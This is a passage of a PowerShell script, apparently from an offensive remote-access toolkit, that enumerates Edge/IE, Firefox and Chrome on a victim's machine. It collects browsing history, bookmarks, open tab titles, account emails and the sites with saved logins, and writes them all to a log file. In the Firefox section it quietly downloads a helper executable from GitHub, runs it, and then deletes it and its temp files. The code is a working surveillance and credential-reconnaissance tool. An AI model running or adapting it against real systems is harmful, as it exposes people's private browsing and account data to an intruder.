$LogFilePath\\BrowserEnum.log\r\n    echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    #>\r\n    ## leak IE Last Active Tab windowsTitle\r\n    echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n    $checkProcess = Get-Process $ProcessName -ErrorAction SilentlyContinue\r\n    If(-not($checkProcess) -or $checkProcess -eq $null){\r\n        echo \"{requires $ProcessName process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        $StoreData = Get-Process $ProcessName | Select -ExpandProperty MainWindowTitle\r\n        $ParseData = $StoreData | where {$_ -ne \"\"}\r\n        $MyPSObject = $ParseData -replace '- Microsoft? Edge',''\r\n        echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## Retrieve IE history URLs\r\n    # \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\"\r\n    # Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\"\r\n    echo \"`nIE History\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"----------\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\")){\r\n        ## Retrieve History from ie`xplorer if not found MsEdge binary installation ..\r\n        $Finaltest = Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\" -ErrorAction SilentlyContinue\r\n        If(-not($Finaltest) -or $Finaltest -eq $null){\r\n            echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\"|findstr /B /I \"url\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }else{\r\n        $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n        $MsEdgeHistory = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User 
Data\\Default\\History\"\r\n        Get-Content \"$MsEdgeHistory\"|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## Retrieve IE Favorites\r\n    echo \"`nIE Favorites\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"------------\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"$env:LOCALAPPDATA\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*\")){\r\n        If(-not(Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Last Tabs\")){\r\n            echo \"{Could not find any Favorites}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $LocalDirPath = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Last Tabs\"\r\n            $ParseFileData = Get-Content \"$LocalDirPath\"|findstr /I /C:\"http\" /I /C:\"https\"\r\n            $DumpFileData = $ParseFileData -replace '[^a-zA-Z/:. ]',''\r\n            ForEach ($Token in $DumpFileData){\r\n                $Token = $Token -replace ' ',''\r\n                echo \"`n\" $Token >> $LogFilePath\\BrowserEnum.log\r\n            }        \r\n        }\r\n\r\n    }else{\r\n\r\n        $LocalDirPath = \"$env:LOCALAPPDATA\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*\"\r\n        $DumpFileData = Get-Content \"$LocalDirPath\" -Raw|findstr /I /C:\"http\" /C:\"https\" # Test.txt and test2.txt (test Files) ..\r\n        ForEach ($Token in $DumpFileData){\r\n            $Token = $Token -replace ' ',''\r\n            echo $Token >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }\r\n\r\n    ## Retrieve IE Bookmarks\r\n    echo \"`nIE Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"------------\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Bookmarks\")){\r\n        ## Leaking ie`xplore\r\n        
$URLs = Get-ChildItem -Path \"$Env:SYSTEMDRIVE\\Users\\\" -Filter \"*.url\" -Recurse -ErrorAction SilentlyContinue\r\n        ForEach ($URL in $URLs){\r\n            if ($URL.FullName -match 'Favorites'){\r\n                $User = $URL.FullName.split('\\')[2]\r\n                Get-Content -Path $URL.FullName|ForEach-Object {\r\n                    try {\r\n                        if ($_.StartsWith('URL')){\r\n                            ## parse the .url body to extract the actual bookmark location\r\n                            $URL = $_.Substring($_.IndexOf('=') + 1)\r\n                                if($URL -match $Search){\r\n                                    echo \"$URL\" >> $LogFilePath\\BrowserEnum.log\r\n                                }\r\n                        }\r\n                    }\r\n                    catch {\r\n                        echo \"Error parsing url: $_\" >> $LogFilePath\\BrowserEnum.log\r\n                    }\r\n                }\r\n            }\r\n        }\r\n\r\n    }else{\r\n        ## Leaking msedge \r\n        $LocalDirPath = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Bookmarks\"\r\n        $DumpFileData = Get-Content \"$LocalDirPath\" -Raw|findstr /I /C:\"http\" /C:\"https\"\r\n        ForEach ($Token in $DumpFileData){\r\n            $Token = $Token -replace '\"','' -replace 'url:','' -replace ' ',''\r\n            echo $Token >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }\r\n}\r\n\r\n\r\nfunction FIREFOX {\r\n    ## Retrieve FireFox Browser Information\r\n    echo \"`n`nFireFox Browser\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Set the Location of firefox prefs.js file\r\n    If(Test-Path \"$Env:APPDATA\\Mozilla\\Firefox\\Profiles\"){\r\n\r\n        ## Check browser: { active|StartTime|PID } Settings\r\n        $FFTestings = (Get-Process Firefox -ErrorAction SilentlyContinue).Responding\r\n        If($FFTestings -eq 
$True){\r\n            $Status = \"Status       : Active\"\r\n            $BsT = Get-Process Firefox|Select -ExpandProperty StartTime\r\n            $StartTime = $BsT[0];$FinalOut = \"StartTime    : $StartTime\"\r\n            echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Status = \"Status       : Stoped\"\r\n            $PSID = \"Process PID  : {requires Firefox process running}\"\r\n            $FinalOut = \"StartTime    : {requires Firefox process running}\"\r\n            echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n            echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n        ## Get Browser Version { 76.0.11 }\r\n        If(-not(Test-Path -Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\"))\r\n        {\r\n            $ParsingData = \"{null}\"\r\n        }\r\n        Else\r\n        {\r\n            If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"))\r\n            {\r\n                If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"))\r\n                {\r\n                    $ParsingData = \"{null}\"\r\n                }\r\n                Else\r\n                {\r\n                    $stupidTrick = $True\r\n                    $FirefoxProfile = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"\r\n                    $JsPrefs = Get-content $FirefoxProfile|Select-String \"extensions.lastPlatformVersion\"\r\n                    $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n                }\r\n            }\r\n            Else\r\n            {\r\n                $FirefoxProfile = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"\r\n                $JsPrefs = Get-content 
$FirefoxProfile|Select-String \"extensions.lastPlatformVersion\"\r\n                $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n            }\r\n        }\r\n        #add data to logfile\r\n        echo \"Version      : $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n\r\n        ## Get brownser startup page { https://www.google.pt }\r\n        $JsPrefs = Get-content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.startup.homepage\"\r\n        If($stupidTrick -eq $True)\r\n        {\r\n            $ParseData = $JsPrefs -split(';');$Strip = $ParseData[0]\r\n            $ParsingData = $Strip -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\)','' -replace 'browser.startup.homepage',''\r\n            echo \"HomePage     $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n        Else\r\n        {\r\n            If($ParsingData -iMatch '{null}')\r\n            {\r\n               $ParsingData = \"  {null}\"\r\n            }\r\n            Else\r\n            {\r\n               $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.startup.homepage',''\r\n            }\r\n            echo \"HomePage     $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n        }\r\n\r\n        ## Get browser.download.dir { C:\\Users\\pedro\\Desktop }\r\n        $JsPrefs = Get-Content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.download.dir\";\r\n        If(-not($JsPrefs) -or $JsPrefs -eq $null){\r\n            ## Test with browser.download.lastDir\r\n            $JsPrefs = Get-Content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.download.lastDir\"\r\n            If(-not($JsPrefs) -or $JsPrefs -eq $null){\r\n                echo \"Downloads    : {null}\" >> 
$LogFilePath\\BrowserEnum.log\r\n            }else{\r\n                $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.download.lastDir','Downloads    '\r\n                If($ParsingData -match '\\\\\\\\'){$ParsingData = $ParsingData -replace '\\\\\\\\','\\'}\r\n                echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log            \r\n            }\r\n        }else{\r\n            $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.download.dir','Downloads    '\r\n            If($ParsingData -match '\\\\\\\\'){$ParsingData = $ParsingData -replace '\\\\\\\\','\\'}\r\n            echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }else{\r\n        echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## Get Firefox.exe binary path\r\n    $BinaryPath = Get-Process firefox -ErrorAction SilentlyContinue\r\n    If(-not($BinaryPath) -or $BinaryPath -eq $null){\r\n        echo \"BinaryPath   : {requires firefox process running}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        $BinaryPath = Get-Process firefox|Select -ExpandProperty Path\r\n        $parseData = $BinaryPath[0]\r\n        echo \"BinaryPath   : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n    ## leak From previous Functions { StartTime|PID }\r\n    echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n    ## Get Firefox Last Active Tab windowsTitle\r\n    echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n    $checkProcess = Get-Process firefox -ErrorAction SilentlyContinue\r\n    If(-not($checkProcess)){\r\n        echo \"{requires firefox process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        
$StoreData = Get-Process firefox|Select -ExpandProperty MainWindowTitle\r\n        $ParseData = $StoreData | where {$_ -ne \"\"}\r\n        $MyPSObject = $ParseData -replace '- Mozilla Firefox',''\r\n        echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n\r\n    ## leak FIREFOX HISTORY URLs\r\n    # Source: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1\r\n    echo \"`nFireFox History\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n    If(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\"){\r\n        $Profiles = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\"\r\n        $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n        Get-Content $Profiles\\places.sqlite -ErrorAction SilentlyContinue|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique | % {\r\n            $Value = New-Object -TypeName PSObject -Property @{\r\n                FireFoxHistoryURL = $_\r\n            }\r\n            if ($Value -match $Search) {\r\n                $ParsingData = $Value -replace '@{FireFoxHistoryURL=','' -replace '}',''\r\n                echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n            }\r\n        }\r\n\r\n    }else{\r\n\r\n        If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\")){\r\n            echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log \r\n        }else{\r\n            $Profiles = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\"\r\n            $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n            Get-Content $Profiles\\places.sqlite -ErrorAction SilentlyContinue|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique | % {\r\n                $Value = New-Object -TypeName PSObject -Property @{\r\n         
           FireFoxHistoryURL = $_\r\n                }\r\n                if ($Value -match $Search) {\r\n                    $ParsingData = $Value -replace '@{FireFoxHistoryURL=','' -replace '}',''\r\n                    echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n                }  \r\n            }\r\n        }\r\n    }\r\n\r\n     ## Retrieve FireFox bookmarks\r\n    echo \"`nFirefox Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"-----------------\" >> $LogFilePath\\BrowserEnum.log\r\n    $IPATH = pwd;$AlternativeDir = $False\r\n    If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\")){\r\n        $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\*.jsonlz4\"   \r\n    }else{\r\n        $AlternativeDir = $True\r\n        $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\*.jsonlz4\" \r\n    }\r\n\r\n    If(-not(Test-Path -Path \"$Bookmarks_Path\")) {\r\n        echo \"{Could not find any Bookmarks}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        If($AlternativeDir -eq $True){\r\n            ## Store last bookmark file into { $Final } local var\r\n            cd \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\\"\r\n            $StorePath = dir \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\*\"\r\n            $Final = $StorePath|Select-Object -ExpandProperty name|Select -Last 1\r\n            ## Copy .Jsonlz4 file to $env:tmp directory\r\n            Copy-Item -Path \"$Final\" -Destination \"$env:tmp\\output.jsonlz4\" -Force\r\n        }else{\r\n            ## Store last bookmark file into { $Final } local var\r\n            cd \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\\"\r\n            $StorePath = dir \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\*\"\r\n            $Final = 
$StorePath|Select-Object -ExpandProperty name|Select -Last 1\r\n            ## Copy .Jsonlz4 file to $env:tmp directory\r\n            Copy-Item -Path \"$Final\" -Destination \"$env:tmp\\output.jsonlz4\" -Force\r\n        }\r\n    \r\n        If(-not(Test-Path \"$Env:TMP\\mozlz4-win32.exe\")){\r\n\r\n            ## Download mozlz4-win32.exe from meterpeter github repo\r\n            Start-BitsTransfer -priority foreground -Source https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/mozlz4-win32.exe -Destination $Env:TMP\\mozlz4-win32.exe -ErrorAction SilentlyContinue|Out-Null   \r\n\r\n            cd $Env:TMP\r\n            ## Convert from jsonlz4 to json\r\n            .\\mozlz4-win32.exe --extract output.jsonlz4 output.json\r\n            $DumpFileData = Get-Content \"$env:tmp\\output.json\" -Raw\r\n            $SplitString = $DumpFileData.split(',')\r\n            $findUri = $SplitString|findstr /I /C:\"uri\"\r\n            $Deliconuri = $findUri|findstr /V /C:\"iconuri\"\r\n            $ParsingData = $Deliconuri -replace '\"','' -replace 'uri:','' -replace '}','' -replace ']',''\r\n            echo $ParsingData >> $LogFilePath\\BrowserEnum.log\r\n            Remove-Item -Path \"$env:tmp\\output.json\" -Force -ErrorAction SilentlyContinue\r\n            Remove-Item -Path \"$env:tmp\\output.jsonlz4\" -Force -ErrorAction SilentlyContinue\r\n\r\n            <#\r\n            .SYNOPSIS\r\n               mozlz4-win32.exe Firefox Fail dependencie bypass\r\n            .DESCRIPTION\r\n               I cant use 'ConvertFrom-Json' cmdlet because it gives 'primitive\r\n               JSON invalid error' parsing .jsonlz4 files to TEXT|CSV format ..\r\n            #>\r\n\r\n            ## [ deprecated function ]\r\n            # $Json = Get-Content \"$Bookmarks_Path\" -Raw\r\n            # $Regex = $Json -replace '[^a-zA-Z0-9/:. 
]','' # Replace all chars that does NOT match the Regex\r\n            #    ForEach ($Key in $Regex){\r\n            #        echo \"`n\" $Key >> $LogFilePath\\BrowserEnum.log\r\n            #    }\r\n\r\n        }Else{\r\n\r\n            cd $Env:TMP\r\n            ## Convert from jsonlz4 to json\r\n            .\\mozlz4-win32.exe --extract output.jsonlz4 output.json\r\n            $DumpFileData = Get-Content \"$env:tmp\\output.json\" -Raw\r\n            $SplitString = $DumpFileData.split(',')\r\n            $findUri = $SplitString|findstr /I /C:\"uri\"\r\n            $Deliconuri = $findUri|findstr /V /C:\"iconuri\"\r\n            $ParsingData = $Deliconuri -replace '\"','' -replace 'uri:','' -replace '}','' -replace ']',''\r\n            echo $ParsingData >> $LogFilePath\\BrowserEnum.log\r\n            Remove-Item -Path \"$env:tmp\\output.json\" -Force -ErrorAction SilentlyContinue\r\n            Remove-Item -Path \"$env:tmp\\output.jsonlz4\" -Force -ErrorAction SilentlyContinue\r\n\r\n        }\r\n    }\r\n    cd $IPATH\r\n    If(Test-Path \"$Env:TMP\\output.jsonlz4\"){Remove-Item -Path \"$Env:TMP\\output.jsonlz4\" -Force}\r\n    If(Test-Path \"$Env:TMP\\mozlz4-win32.exe\"){Remove-Item -Path \"$Env:TMP\\mozlz4-win32.exe\" -Force}\r\n\r\n    ## Retrieve Firefox logins\r\n    echo \"`nEnumerating LogIns\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\logins.json\"))\r\n    {\r\n        If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\logins.json\"))\r\n        {\r\n            echo \"{None URL's found}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $ReadData = Get-Content \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\logins.json\" \r\n            $SplitData = $ReadData -split(',')\r\n            $ParseData = $SplitData|findstr /I /C:\"http\" /I 
/C:\"https\"|findstr /V /C:\"httpRealm\" /V /C:\"formSubmitURL\"\r\n            $Json = $ParseData -replace '\":','' -replace '\"','' -replace 'hostname',''\r\n            echo $Json >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n    }else{\r\n        $ReadData = Get-Content \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\logins.json\" \r\n        $SplitData = $ReadData -split(',')\r\n        $ParseData = $SplitData|findstr /I /C:\"http\" /I /C:\"https\"|findstr /V /C:\"httpRealm\" /V /C:\"formSubmitURL\"\r\n        $Json = $ParseData -replace '\":','' -replace '\"','' -replace 'hostname',''\r\n        echo $Json >> $LogFilePath\\BrowserEnum.log\r\n    }\r\n}\r\n\r\n\r\nfunction CHROME {\r\n    ## Retrieve Google Chrome Browser Information\r\n    echo \"`n`nChrome Browser\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"--------------\" >> $LogFilePath\\BrowserEnum.log\r\n    $Chrome_App = Get-ItemProperty 'HKCU:\\Software\\Google\\Chrome\\BLBeacon' -ErrorAction SilentlyContinue\r\n    If(-not($Chrome_App) -or $Chrome_App -eq $null){\r\n        echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        ## Test if browser its active \r\n        $Preferencies_Path = get-content \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Preferences\" -ErrorAction SilentlyContinue\r\n        $CHTestings = (Get-Process Chrome -ErrorAction SilentlyContinue).Responding\r\n        If($CHTestings -eq $True){\r\n            $Status = \"Status       : Active\"\r\n            ## Get Browser startTime\r\n            $BsT = Get-Process Chrome|Select -ExpandProperty StartTime\r\n            $StartTime = $BsT[0];$FinalOut = \"StartTime    : $StartTime\"\r\n            $SSID = get-process Chrome|Select -Last 1|Select-Object -Expandproperty Id\r\n            $PSID = \"Process PID  : $SSID\"\r\n        }else{\r\n            $Status = \"Status       : Stoped\"\r\n            $PSID = \"Process PID  : {requires Chrome process 
running}\"\r\n            $FinalOut = \"StartTime    : {requires Chrome process running}\"\r\n        }\r\n        echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n        ## Retrieve Browser accept languages\r\n        If($Preferencies_Path){\r\n            $Parse_String = $Preferencies_Path.split(\",\")\r\n            $Search_Lang = $Parse_String|select-string \"accept_languages\"\r\n            $Parse_Dump = $Search_Lang -replace '\"','' -replace 'intl:{','' -replace ':','    : ' -replace 'accept_languages','Languages'\r\n            If(-not($Parse_Dump) -or $Parse_Dump -eq $null){\r\n                echo \"Languages    : {null}\" >> $LogFilePath\\BrowserEnum.log\r\n            }else{\r\n                echo \"$Parse_Dump\" >> $LogFilePath\\BrowserEnum.log\r\n            }\r\n        }\r\n\r\n        ## Retrieve Browser Version\r\n        $GCVersionInfo = (Get-ItemProperty 'HKCU:\\Software\\Google\\Chrome\\BLBeacon').Version\r\n        echo \"Version      : $GCVersionInfo\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n        ## Retrieve Download Folder (default_directory) Settings\r\n        If($Preferencies_Path){\r\n            $Parse_String = $Preferencies_Path.split(\",\")\r\n            $Download_Dir = $Parse_String|select-string \"savefile\"\r\n            If(-not($Download_Dir) -or $Download_Dir -eq $null){\r\n                echo \"Downloads    : $env:userprofile\\Downloads\" >> $LogFilePath\\BrowserEnum.log\r\n            }else{\r\n                $Parse_Dump = $Download_Dir -replace '\"','' -replace '{','' -replace '}','' -replace 'default_directory:','' -replace 'savefile:','Downloads    : '\r\n                If($Parse_Dump -match '\\\\\\\\'){$Parse_Dump = $Parse_Dump -replace '\\\\\\\\','\\'}\r\n                echo \"$Parse_Dump\" >> $LogFilePath\\BrowserEnum.log\r\n            }\r\n        }\r\n\r\n        ## leak Chrome.exe binary path\r\n        $BinaryPath = Get-Process chrome -ErrorAction SilentlyContinue\r\n        If(-not($BinaryPath) 
-or $BinaryPath -eq $null){\r\n            echo \"BinaryPath   : {requires chrome process running}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $BinaryPath = Get-Process chrome|Select -ExpandProperty Path\r\n            $parseData = $BinaryPath[0]\r\n            echo \"BinaryPath   : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n        echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n        ## leak Chrome Last Active Tab windowsTitle\r\n        echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n        $checkTitle = Get-Process chrome -ErrorAction SilentlyContinue\r\n        If(-not($checkTitle)){\r\n            echo \"{requires chrome process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $StoreData = Get-Process chrome|Select -ExpandProperty MainWindowTitle\r\n            $ParseData = $StoreData|where {$_ -ne \"\"}\r\n            $MyPSObject = $ParseData -replace '- Google Chrome',''\r\n            ## Write my PSobject to logfile\r\n            echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n\r\n        ## Retrieve Email(s) from Google CHROME preferencies File ..\r\n        If($Preferencies_Path){\r\n            $Parse_String = $Preferencies_Path.split(\",\")\r\n            $Search_Email = $Parse_String|select-string \"email\"\r\n            $Parse_Dump = $Search_Email -replace '\"','' -replace 'email:',''\r\n            If(-not($Search_Email) -or $Search_Email -eq $null){\r\n                echo \"Email            : {None Email's Found}`n\" >> $LogFilePath\\BrowserEnum.log\r\n            }else{\r\n                ## Build new PSObject to store emails found\r\n                $Store = ForEach ($Email in $Parse_Dump){\r\n                    New-Object -TypeName PSObject -Property @{\r\n                        Emails 
= $Email\r\n                    }\r\n                }\r\n                ## Write new PSObject to logfile\r\n                echo $Store >> $LogFilePath\\BrowserEnum.log\r\n                }\r\n            }\r\n        }\r\n\r\n        ## Retrieve Chrome History\r\n        # Source: https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1\r\n        echo \"`nChrome History\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"--------------\" >> $LogFilePath\\BrowserEnum.log\r\n        If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\")){\r\n            echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Regex = '(htt(p|s))://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n            $History_Path = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\"\r\n            $Get_Values = Get-Content -Path \"$History_Path\"|Select-String -AllMatches $Regex |% {($_.Matches).Value} |Sort -Unique\r\n            $Get_Values|ForEach-Object {\r\n                $Key = $_\r\n                if ($Key -match $Search){\r\n                    echo \"$_\" >> $LogFilePath\\BrowserEnum.log\r\n                }\r\n            }\r\n        }\r\n\r\n        ## Retrieve Chrome bookmarks\r\n        echo \"`nChrome Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"----------------\" >> $LogFilePath\\BrowserEnum.log\r\n        If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks\")) {\r\n            echo \"{Could not find any Bookmarks}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Json = Get-Content \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks\"\r\n            $Output = ConvertFrom-Json20($Json) ## TODO:\r\n            $Jsonobject = $Output.roots.bookmark_bar.children\r\n            $Jsonobject.url|Sort -Unique|ForEach-Object {\r\n                if ($_ 
-match $Search) {\r\n                    echo \"$_\" >> $LogFilePath\\BrowserEnum.log\r\n                }\r\n            }\r\n        }\r\n\r\n        ## Retrieve Chrome URL logins\r\n        echo \"`nEnumerating LogIns\" >> $LogFilePath\\BrowserEnum.log\r\n        echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n        If(-not(Test-Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\")){\r\n            echo \"{None URL's found}\" >> $LogFilePath\\BrowserEnum.log\r\n        }else{\r\n            $Regex = '(htt(p|s))://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n            $ReadData = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\"\r\n            $Json = Get-Content -Path \"$ReadData\"|Select-String -AllMatches $Regex |% {($_.Matches).Value} |Sort -Unique\r\n            echo $Json >> $LogFilePath\\BrowserEnum.log\r\n        }\r\n}\r\n\r\n\r\nfunction ADDONS {  \r\n    ## Retrieve IE addons\r\n    echo \"`n`n[ IE|MSEDGE ]\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"`nName\" >> $LogFilePath\\BrowserEnum.log\r\n    echo \"----\" >> $LogFilePath\\BrowserEnum.log\r\n    If(-not(Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Settings\")){\r\n        echo \"{None addons found}\" >> $LogFilePath\\BrowserEnum.log\r\n    }else{\r\n        If(-not(Test-Path HKCR:)){New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT|Out-Null} \r\n        $Registry_Keys = @( \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Settings\",\r\n        \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\Browser Helper Objects\",\r\n        \"HKLM:\\Software\\Microsoft\\Internet Explorer\\URLSearchHooks\",\r\n        \"HKLM:\\Software\\Microsoft\\Internet Explorer\\Extensions\",\r\n        \"HKCU:\\Software\\Microsoft\\Internet 